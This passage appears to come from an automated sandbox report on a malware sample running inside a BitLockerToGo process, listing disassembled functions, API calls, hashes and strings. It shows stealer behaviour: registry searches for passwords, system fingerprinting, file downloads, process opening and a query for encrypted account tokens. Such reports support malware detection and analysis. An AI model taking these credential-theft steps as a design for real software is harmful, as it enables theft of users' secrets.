                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                                                                                                                      • String ID: :
                                                                                                                                                      • API String ID: 3191641157-3653984579
                                                                                                                                                      • Opcode ID: a87fb90ae3ddd568bc04a4f8ccd2a4bb255ec5174c6cb13def75b00999e328c1
                                                                                                                                                      • Instruction ID: 9791ac572a6fb2eb988647ad6deeb8ec8d2928f09b268064ecac0945bef8e2ae
                                                                                                                                                      • Opcode Fuzzy Hash: a87fb90ae3ddd568bc04a4f8ccd2a4bb255ec5174c6cb13def75b00999e328c1
                                                                                                                                                      • Instruction Fuzzy Hash: D0315AB2D44109DFCB09EBB8DC89DFFB7B9FB44311B104518E502A7240DA74A952CFA1
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 02757314
                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,02757C90), ref: 0275733A
                                                                                                                                                      • RegEnumValueA.ADVAPI32(02757C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 027573B1
                                                                                                                                                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0275740D
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,02757C90,80000001,027661C4,?,?,?,?,?,02757C90,?), ref: 02757452
                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,02757C90,80000001,027661C4,?,?,?,?,?,02757C90,?), ref: 02757459
                                                                                                                                                        • Part of subcall function 02759240: vsprintf_s.MSVCRT ref: 0275925B
                                                                                                                                                      • task.LIBCPMTD ref: 02757555
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                                                                                                                      • String ID: Password
                                                                                                                                                      • API String ID: 2698061284-3434357891
                                                                                                                                                      • Opcode ID: b9abc30520d870721c99b9e233fc744bf8acfef4970547e80d2448682bef7cbf
                                                                                                                                                      • Instruction ID: 4eb3b973da881e95cf6bde7840ab58168dcb8264ea50fdcc229015c7d81c90af
                                                                                                                                                      • Opcode Fuzzy Hash: b9abc30520d870721c99b9e233fc744bf8acfef4970547e80d2448682bef7cbf
                                                                                                                                                      • Instruction Fuzzy Hash: 7A611CB5D402689BDB25DB50CC55BEAF7B9FF44300F0081E9EA89A6140DBB15BC9CFA1
                                                                                                                                                      APIs
                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 02767542
                                                                                                                                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0276757F
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02767603
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0276760A
                                                                                                                                                      • wsprintfA.USER32 ref: 02767640
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                                                                                      • String ID: :$C$\
                                                                                                                                                      • API String ID: 1544550907-3809124531
                                                                                                                                                      • Opcode ID: c84c148fdde0ea9ff4d29fa9332fce34f1734a42368ed538b146d571a23109b6
                                                                                                                                                      • Instruction ID: c13838f5ddfbd8bf7edfbcf545a4b71a6612613e5ac2154c733edfbb1831d1c1
                                                                                                                                                      • Opcode Fuzzy Hash: c84c148fdde0ea9ff4d29fa9332fce34f1734a42368ed538b146d571a23109b6
                                                                                                                                                      • Instruction Fuzzy Hash: B241B3B1D04258ABDB11DF98DC48BFEBBB8EF08754F000198E90977280D7796A44CFA5
                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,029E6088,00000000,?,02770E2C,00000000,?,00000000), ref: 02768130
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02768137
                                                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 02768158
                                                                                                                                                      • __aulldiv.LIBCMT ref: 02768172
                                                                                                                                                      • __aulldiv.LIBCMT ref: 02768180
                                                                                                                                                      • wsprintfA.USER32 ref: 027681AC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                                                                                                                                      • String ID: %d MB$@
                                                                                                                                                      • API String ID: 2774356765-3474575989
                                                                                                                                                      • Opcode ID: 4546f85c5c4fbdb7aa5cacd043252546e3ac25627a1f737ac54b66f3434b7677
                                                                                                                                                      • Instruction ID: 7b6d8ae4a8147462b332107341804eb22fc7512366e15d5d6fbd07c89957523f
                                                                                                                                                      • Opcode Fuzzy Hash: 4546f85c5c4fbdb7aa5cacd043252546e3ac25627a1f737ac54b66f3434b7677
                                                                                                                                                      • Instruction Fuzzy Hash: 46214DB1E44218ABEB14DFD5CC49FBEB7B9FB44B10F104509F605BB280D77959048BA5
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0276A7E6
                                                                                                                                                        • Part of subcall function 027547B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 027547EA
                                                                                                                                                        • Part of subcall function 027547B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02754801
                                                                                                                                                        • Part of subcall function 027547B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02754818
                                                                                                                                                        • Part of subcall function 027547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02754839
                                                                                                                                                        • Part of subcall function 027547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 02754849
                                                                                                                                                      • InternetOpenA.WININET(02770DF7,00000001,00000000,00000000,00000000), ref: 0275610F
                                                                                                                                                      • StrCmpCA.SHLWAPI(?,029E4B88), ref: 02756147
                                                                                                                                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0275618F
                                                                                                                                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 027561B3
                                                                                                                                                      • InternetReadFile.WININET(02762B61,?,00000400,?), ref: 027561DC
                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0275620A
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00000400), ref: 02756249
                                                                                                                                                      • InternetCloseHandle.WININET(02762B61), ref: 02756253
                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 02756260
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4287319946-0
                                                                                                                                                      • Opcode ID: 9f8915a267693a9fe19fa843e391c190483bf8a793cc0f18693ff825a6c31195
                                                                                                                                                      • Instruction ID: 231b73210088f7a7704f51353f954d7f9f37484393bf1ae59002a69b53fb0811
                                                                                                                                                      • Opcode Fuzzy Hash: 9f8915a267693a9fe19fa843e391c190483bf8a793cc0f18693ff825a6c31195
                                                                                                                                                      • Instruction Fuzzy Hash: 975190B0E40218ABDF20DF54CC49BFEB7B9EB04305F408498AA05B71C0DBB56A85CF94
                                                                                                                                                      APIs
                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 027670DE
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,0276730D,027705BD), ref: 0276711C
                                                                                                                                                      • memset.MSVCRT ref: 0276716A
                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 027672BE
                                                                                                                                                      Strings
                                                                                                                                                      • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0276718C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: OpenProcesslstrcpymemset
                                                                                                                                                      • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                                                                                                                      • API String ID: 224852652-4138519520
                                                                                                                                                      • Opcode ID: 8d1283f3c0cfada752ac2f9d44e417aa08e351bd42b39b62292494100a8c1717
                                                                                                                                                      • Instruction ID: 4b08ef09d4ce2a6040401088c308fce386b9115e72554ebd1c70315c65c181d2
                                                                                                                                                      • Opcode Fuzzy Hash: 8d1283f3c0cfada752ac2f9d44e417aa08e351bd42b39b62292494100a8c1717
                                                                                                                                                      • Instruction Fuzzy Hash: 2F514DB0D002199FDB19EB90DC99BFEF775EF44304F1441A9EA1576180EB746A88CF64
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrlen.KERNEL32(?,02771110,?,00000000,02770AEF), ref: 0276A9C5
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcpy.KERNEL32(00000000), ref: 0276AA04
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0276AA12
                                                                                                                                                        • Part of subcall function 0276A920: lstrcpy.KERNEL32(00000000,?), ref: 0276A972
                                                                                                                                                        • Part of subcall function 0276A920: lstrcat.KERNEL32(00000000), ref: 0276A982
                                                                                                                                                        • Part of subcall function 0276A8A0: lstrcpy.KERNEL32(?,02770AEF), ref: 0276A905
                                                                                                                                                        • Part of subcall function 0276A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0276A7E6
                                                                                                                                                        • Part of subcall function 02759E10: memcmp.MSVCRT(?,v20,00000003), ref: 02759E2D
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0275BC9F
                                                                                                                                                        • Part of subcall function 02768E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02768E52
                                                                                                                                                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 0275BCCD
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0275BDA5
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0275BDB9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                                                                                                                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                                                                                                                      • API String ID: 1440504306-1079375795
                                                                                                                                                      • Opcode ID: ff0f64244f78f3de61e8d56032d69fe369d92a0f8a653823d11d6894baae674e
                                                                                                                                                      • Instruction ID: 2811ef6009aaadace5cf4b65ab928663465a1dbf0a9ecda6fe7a055da6297bbd
                                                                                                                                                      • Opcode Fuzzy Hash: ff0f64244f78f3de61e8d56032d69fe369d92a0f8a653823d11d6894baae674e
                                                                                                                                                      • Instruction Fuzzy Hash: C8B14F719102189BDF06FBA4CD9DEFEB37AAF54300F504569E906B6190EF346A49CFA0
                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02754FCA
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02754FD1
                                                                                                                                                      • InternetOpenA.WININET(02770DDF,00000000,00000000,00000000,00000000), ref: 02754FEA
                                                                                                                                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 02755011
                                                                                                                                                      • InternetReadFile.WININET(02765EDB,?,00000400,00000000), ref: 02755041
                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000001), ref: 0275508A
                                                                                                                                                      • InternetCloseHandle.WININET(02765EDB), ref: 027550B9
                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 027550C6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
